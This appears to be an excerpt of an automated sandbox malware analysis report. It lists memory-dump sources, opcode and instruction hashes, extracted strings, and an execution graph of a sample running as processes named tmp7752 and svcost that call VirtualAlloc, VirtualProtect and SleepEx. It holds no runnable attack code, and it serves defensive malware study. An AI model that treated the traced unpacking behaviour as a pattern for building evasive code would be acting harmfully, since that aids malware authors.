                                                                                            • Instruction Fuzzy Hash: 7AE0EC30905358EFCB44EFB8E95DA9DBBB8AB04305F2041A98849A3250EB715A94DB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fa854ada47dfd22a8f4ca1051fdecf00df32230a8eb0d8ec46a72555aa690d13
                                                                                            • Instruction ID: 6ef635b0ec3f5ea4a44a74487f649d7af130a7db0d6efc057eb5bfefabdf00e1
                                                                                            • Opcode Fuzzy Hash: fa854ada47dfd22a8f4ca1051fdecf00df32230a8eb0d8ec46a72555aa690d13
                                                                                            • Instruction Fuzzy Hash: 87E0C234905208EBC704DF94EA5096CBB79EF4A308F2485FCC80813340CB32AE46CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 51ddf72656c0434d73a56900f93afcb1e79b88dd7a013a657aa91cc6985d2210
                                                                                            • Instruction ID: fe82963fa3829e9d7966926dd7dc1ff424ac519873896c19c696395f45a4b5c5
                                                                                            • Opcode Fuzzy Hash: 51ddf72656c0434d73a56900f93afcb1e79b88dd7a013a657aa91cc6985d2210
                                                                                            • Instruction Fuzzy Hash: 0CE01234905208EFDB08EF94DA559ADBB79EB45304F2091EDC80827341CB329E42DBC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            • Instruction Fuzzy Hash: D7E01734500048EFCF42AFC0D8549DE7B73FB89301F108104F5157B2A8C7799995DB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89b54e65afe6229d3f592b531c3f6d727b6cb7e3d2c0480ddf1e4e8e8399021e
                                                                                            • Instruction ID: 9561001b0ad870b4b0f24baaeeb81d8eddd5505bd4188e628d9855d6b40bfa9a
                                                                                            • Opcode Fuzzy Hash: 89b54e65afe6229d3f592b531c3f6d727b6cb7e3d2c0480ddf1e4e8e8399021e
                                                                                            • Instruction Fuzzy Hash: 89D05B74A003188FC710DF50E45469D77F1BB58304F204554C40D6B318CBB499408F40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68c6678123c97dd4fe391f25bd8dce053d28363ccaa636ceb7af97ea1da708ae
                                                                                            • Instruction ID: 812944065c7fe7af260d6bedbe703f86479929819b0e29e5980cce528edadc8f
                                                                                            • Opcode Fuzzy Hash: 68c6678123c97dd4fe391f25bd8dce053d28363ccaa636ceb7af97ea1da708ae
                                                                                            • Instruction Fuzzy Hash: 5AC04C3404B74587D3246755B93EF7D729C9706205F406754950D014624B759050CA95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5ca0c37c84a5aee3f5a7b06b0af6d44fde3c3e4d9926d900c2702453c34e103c
                                                                                            • Instruction ID: 2e5c7fb4618bb08bb45ddd4f71c7fe8064a52513fb336e3acbcc541b232ae36a
                                                                                            • Opcode Fuzzy Hash: 5ca0c37c84a5aee3f5a7b06b0af6d44fde3c3e4d9926d900c2702453c34e103c
                                                                                            • Instruction Fuzzy Hash: FCC08C300067048BE2243BE0BE1DF393658AB0130AF008120E10C409708F355454CB2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6dda6d9404dfecfba6e1ec78ce0be54c623fc661299ddf02cf1f61ee91af5a0c
                                                                                            • Instruction ID: c156a8e7bcce2d10d08589b8da0b068df63a46f4c8f5e750c74e4623edbcc744
                                                                                            • Opcode Fuzzy Hash: 6dda6d9404dfecfba6e1ec78ce0be54c623fc661299ddf02cf1f61ee91af5a0c
                                                                                            • Instruction Fuzzy Hash: C0D0C770914629CBD721DF50DC547E9B7B5BB54305F0045A8E41D5F254C7B05B458F40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1197448706dda5c300bb24b05d046315422d71a0baaed1b9066eff48ca8334a5
                                                                                            • Instruction ID: a13515b9b5a43fbd606254e126dcbac7d0bb12f018c62a20a308b9676c9494f2
                                                                                            • Opcode Fuzzy Hash: 1197448706dda5c300bb24b05d046315422d71a0baaed1b9066eff48ca8334a5
                                                                                            • Instruction Fuzzy Hash: 52C00276E501199A8F00DAD9E4518DCB774EB94321B004026E614A6104D6302526CB54
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6352fd681ba840e43efa97ad829bd155f8a6ee9d7f503ff9781e0e0fc4c5bb33
                                                                                            • Instruction ID: a8eee47f57a96e4c80c5c550b52359cb97205f3397882ad14d37828dee34bcf7
                                                                                            • Opcode Fuzzy Hash: 6352fd681ba840e43efa97ad829bd155f8a6ee9d7f503ff9781e0e0fc4c5bb33
                                                                                            • Instruction Fuzzy Hash: FFC0925904F3C12FD303A6302C696942F3228932083CE8ACB99D48B9A7E85A009A8303
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc42403cfc9e123169807f9e753cc25272a21d0b359b82099c628cc0c5909ff9
                                                                                            • Instruction ID: 99f7c801265487bcf204c280546c0bb74cfa25623dce7855d3bd9c2b43e3c4ca
                                                                                            • Opcode Fuzzy Hash: dc42403cfc9e123169807f9e753cc25272a21d0b359b82099c628cc0c5909ff9
                                                                                            • Instruction Fuzzy Hash: E1C04C3415D164CBD7057B51F91C6A93626E79A308F105058D056366D9CB789905DF24
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$,!p
                                                                                            • API String ID: 0-3887861923
                                                                                            • Opcode ID: 547fdf14083934056b8569f6cc3ba073b5c90a0c2151fe1c84f18bec5a518885
                                                                                            • Instruction ID: d5db27ced49c094e4424efe4c1855ce351d739ae66742aee87af3d2c759ff15d
                                                                                            • Opcode Fuzzy Hash: 547fdf14083934056b8569f6cc3ba073b5c90a0c2151fe1c84f18bec5a518885
                                                                                            • Instruction Fuzzy Hash: 34D13834A00614CFDB14DF68D584AADB7F2FF99318F6984A9E4059B361DB70EC41CB60
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 9$F
                                                                                            • API String ID: 0-3131834894
                                                                                            • Opcode ID: 8985654c189604d2de971d663317bd6dacd66cf5fbec51eecec88a0afbd62271
                                                                                            • Instruction ID: 5ed8d6345ac474daff6db15532db393df6eb4871eccf474c10470d62a291a7d1
                                                                                            • Opcode Fuzzy Hash: 8985654c189604d2de971d663317bd6dacd66cf5fbec51eecec88a0afbd62271
                                                                                            • Instruction Fuzzy Hash: 9F3199B1E056198BEB1CCF6B8C4469EFAF7AFC9340F14D1BAC418A6264DB740A818E54
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Wzb
                                                                                            • API String ID: 0-2715965760
                                                                                            • Opcode ID: 173f6dedd0649fcc4dc56a1a21ab9c2b4587c592e0d9f82000ed489eced143be
                                                                                            • Instruction ID: 0e90026d9fb04d68c4aa9280b8b1516dc4181ece716a0d7040a444ed003f22a3
                                                                                            • Opcode Fuzzy Hash: 173f6dedd0649fcc4dc56a1a21ab9c2b4587c592e0d9f82000ed489eced143be
                                                                                            • Instruction Fuzzy Hash: B9713E74A05208DFDB64DF29E859BADBBF5BB09300F0085EAE40AA7391DB755980CF01
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: )
                                                                                            • API String ID: 0-2427484129
                                                                                            • Opcode ID: ee1d6f95c7a1df5edc40ec67f0a66d63e3593c673329b79ca95c6c3463149d51
                                                                                            • Instruction ID: fab8afca9eba6880de9189fff73087be1247f034ea9c16d0e32d4775f746ec91
                                                                                            • Opcode Fuzzy Hash: ee1d6f95c7a1df5edc40ec67f0a66d63e3593c673329b79ca95c6c3463149d51
                                                                                            • Instruction Fuzzy Hash: C6416171D05A588BEB1CCF6B9C4069EFAF7AFC9305F14C1B9840CAA259EB3045428F51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: h
                                                                                            • API String ID: 0-2439710439
                                                                                            • Opcode ID: 30cdc0a5ba0437d241e80df85ce0fa5fb94a7a06c60d0f936af67cb9bced9473
                                                                                            • Instruction ID: beb41be32a6790613f2e84ec2a590b7c335478d45b2b9ac2d464bb7b3a1ad7ff
                                                                                            • Opcode Fuzzy Hash: 30cdc0a5ba0437d241e80df85ce0fa5fb94a7a06c60d0f936af67cb9bced9473
                                                                                            • Instruction Fuzzy Hash: 6B311B70E096288BEB29DF5AD95869EB7F7BBC9300F00D0EAD508A7254DB341A858F11
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: h
                                                                                            • API String ID: 0-2439710439
                                                                                            • Opcode ID: 99f23d9d928b36848744c4f1941fbcfdcaf469a4ca9bd37a71c1cb32411fe832
                                                                                            • Instruction ID: c05b701ff3a924342bd8b2428a7316bb5179bf43c34e6a89338c965d36f60479
                                                                                            • Opcode Fuzzy Hash: 99f23d9d928b36848744c4f1941fbcfdcaf469a4ca9bd37a71c1cb32411fe832
                                                                                            • Instruction Fuzzy Hash: 0F312E71D097558FE72ACF67C859299BBF3AF85300F18C0FAC448A6255EB780A86CF11
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488752664.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_610000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c503b69200f7f4ed988c59819fceed996324509732ffa55a9e07e75f62041a78
                                                                                            • Instruction ID: 361101187c992629c6c0a2b93a872cbf540773fba6f6ed8df287e5ad6a734236
                                                                                            • Opcode Fuzzy Hash: c503b69200f7f4ed988c59819fceed996324509732ffa55a9e07e75f62041a78
                                                                                            • Instruction Fuzzy Hash: 9A22247054E3C0AFE71397758C69B9A3F759B43314F1A44EBE084DA2E3C6A84889C772
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f009d6f7215560aaa2078890ee591fb27c8bd0cdeed4e7dccdab1c7f2446ac8
                                                                                            • Instruction ID: 6b91a22ad80dfc8140961962b58c26ed72778e07b44960f0c3a9a319723606ea
                                                                                            • Opcode Fuzzy Hash: 9f009d6f7215560aaa2078890ee591fb27c8bd0cdeed4e7dccdab1c7f2446ac8
                                                                                            • Instruction Fuzzy Hash: A812B271E006588FDB18CFAAC98069DFBF2BF88314F24C569D459EB21AD734A946CF50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 310e041b1885a87356158d2dc4d83e3b9c1fa7d0aa19435ded684d9dface79cf
                                                                                            • Instruction ID: 0e7e4d9ba6635295f428694f2640554dc6b15d825032a3bb7b6f110bba6d1645
                                                                                            • Opcode Fuzzy Hash: 310e041b1885a87356158d2dc4d83e3b9c1fa7d0aa19435ded684d9dface79cf
                                                                                            • Instruction Fuzzy Hash: 37121774A09228CFDB24DF69E854BADB7F2BB99304F2080E9D409A7355DB749D85CF20
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492334171.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_4a70000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492334171.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_4a70000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488521635.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_460000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: S$X$c$c,
                                                                                            • API String ID: 0-10682623
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O$a$d$c,
                                                                                            • API String ID: 0-3816431348

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.6%
                                                                                            Dynamic/Decrypted Code Coverage:71.9%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:64
                                                                                            Total number of Limit Nodes:3
                                                                                            execution_graph 50781 23a64b8 50782 23a64c2 50781->50782 50786 212bf18 50782->50786 50791 212bf08 50782->50791 50783 23a64a2 50787 212bf2d 50786->50787 50796 212bf58 50787->50796 50800 212bf49 50787->50800 50788 212bf43 50788->50783 50792 212bf2d 50791->50792 50794 212bf58 2 API calls 50792->50794 50795 212bf49 2 API calls 50792->50795 50793 212bf43 50793->50783 50794->50793 50795->50793 50798 212bf82 50796->50798 50797 212bfc1 50797->50788 50798->50797 50804 212f847 50798->50804 50802 212bf82 50800->50802 50801 212bfc1 50801->50788 50802->50801 50803 212f847 2 API calls 50802->50803 50803->50802 50805 212f86d 50804->50805 50809 212f710 50805->50809 50813 212f708 50805->50813 50806 212f888 50806->50798 50810 212f754 SleepEx 50809->50810 50812 212f7b4 50810->50812 50812->50806 50814 212f710 SleepEx 50813->50814 50816 212f7b4 50814->50816 50816->50806 50817 44bef08 50818 44bef4c VirtualAlloc 50817->50818 50820 44befb9 50818->50820 50842 2f88c8 50843 2f88d3 50842->50843 50844 2f88f5 50843->50844 50849 44b4cd6 50843->50849 50853 44ba647 50843->50853 50856 44b7a1d 50843->50856 50860 44b244d 50843->50860 50850 44b4cf5 50849->50850 50852 44bd840 VirtualProtect 50850->50852 50851 44b4d1a 50852->50851 50855 44bd840 VirtualProtect 50853->50855 50854 44b01de 50855->50854 50857 44b7a3c 50856->50857 50859 44bd840 VirtualProtect 50857->50859 50858 44b01de 50859->50858 50862 44bd840 VirtualProtect 50860->50862 50861 44b01de 50862->50861 50863 614288 50864 61429b LdrInitializeThunk 50863->50864 50866 6142c3 50864->50866 50821 14d048 50822 14d060 50821->50822 50823 14d0bb 50822->50823 50825 44be428 50822->50825 50826 44be481 50825->50826 50829 44be9b8 50826->50829 50827 44be4b6 50830 44be9e5 50829->50830 50833 44beb7b 50830->50833 50834 44bd840 50830->50834 50833->50827 50836 44bd867 50834->50836 50838 44bdd40 50836->50838 50839 44bdd89 VirtualProtect 50838->50839 50841 44bd924 50839->50841 
50841->50827

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: f"p$8$lC$lC$lC$lC$lC$xC$xC$xC$C$C$C$C$cV
                                                                                            • API String ID: 0-1429672992

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: f"p$h$xC$xC$xC$cV
                                                                                            • API String ID: 0-785447965
                                                                                            • Opcode ID: 91cdae61c447c0b6b29348599296a0782da69b854f24f51855ea8492e6ac903f
                                                                                            • Instruction ID: 4e943302cf8afc5837d8ebc95c9259a9817109b152f0fff82d9db85d2d432761
                                                                                            • Opcode Fuzzy Hash: 91cdae61c447c0b6b29348599296a0782da69b854f24f51855ea8492e6ac903f
                                                                                            • Instruction Fuzzy Hash: 8B71F475E042288FEB64DF69C850BDAB7B2FF89300F5082AAD419B7255DB306E85CF50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0lC$2$H<C$LkC$cV
                                                                                            • API String ID: 0-608499003
                                                                                            • Opcode ID: fa2a3e1e263a4665c1c006c68e0eefabd0039ac7ea4fb6e075b2cbc49fa45da3
                                                                                            • Instruction ID: eb6442e64555ca8d1ffe85f13f1c3415773016021edd3cbe9d1f67c623b119b9
                                                                                            • Opcode Fuzzy Hash: fa2a3e1e263a4665c1c006c68e0eefabd0039ac7ea4fb6e075b2cbc49fa45da3
                                                                                            • Instruction Fuzzy Hash: 58E2B374A046288FCB65DF68D88479EB7F2FB89301F1081EAE519A7395DB709E85CF40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kp$fp
                                                                                            • API String ID: 0-1917797414
                                                                                            • Opcode ID: 6ef88ef9399f207a45105c882ffe6faa4fc2478b0b975ca1572fe6f20f488a86
                                                                                            • Instruction ID: db14c16fb82e456d98f9aa76ed111164556b5bdbe5c1a8c09a082a04a38d7437
                                                                                            • Opcode Fuzzy Hash: 6ef88ef9399f207a45105c882ffe6faa4fc2478b0b975ca1572fe6f20f488a86
                                                                                            • Instruction Fuzzy Hash: 33B2F634A00218DFDB14DFA8C894BADB7B6FF88704F1495AAE505AB3A5DB70AC41CF50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0C$TJ"p$p!p$xb p
                                                                                            • API String ID: 0-2232361194
                                                                                            • Opcode ID: 3b94726669cc1c72c391e4b40620e70b532d0c777aa9fb63d92b0add06447d09
                                                                                            • Instruction ID: ebd28646979bd7989d0f23eb064a5bbdf4d68fdb5ed06354ef0cb4978ec7380d
                                                                                            • Opcode Fuzzy Hash: 3b94726669cc1c72c391e4b40620e70b532d0c777aa9fb63d92b0add06447d09
                                                                                            • Instruction Fuzzy Hash: E0A2B575A10228CFDB64CF69C984B9DBBB2BF89304F1581E9D509AB325DB319E91CF40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
